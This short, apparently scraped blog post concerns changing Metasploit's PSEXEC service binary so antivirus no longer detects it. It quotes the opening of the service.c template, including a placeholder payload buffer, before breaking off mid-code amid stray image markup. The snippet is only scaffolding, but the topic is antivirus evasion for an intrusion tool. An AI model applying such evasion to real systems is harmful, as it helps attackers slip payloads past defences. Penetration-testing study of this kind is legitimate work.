@jabjorkhaug posed the following question on Twitter today:
I figured I could solve this and it would be an interesting challenge. Here is what it gets detected as:
The service binary that is used as part of PSEXEC is located here:
MSF Directory/data/templates/src/pe/exe/service/service.c
The important part to look at starts at line 57:
#define WIN32_LEAN_AND_MEAN #include <windows.h> #define PAYLOAD_SIZE 8192 char cServiceName[32] = "SERVICENAME"; char bPayload[PAYLOAD_SIZE] = "PAYLOAD:"; SERVICE_STATUS ss; SERVICE_STATUS_HANDLE hStatus = NULL; /* * */ BOOL ServiceHandler( DWORD dwControl ) { if( dwControl == SERVICE_CONTROL_STOP || dwControl == SERVICE_CONTROL_SHUTDOWN ) { ss.![]()
![]()
![]()
![]()
![]()
↧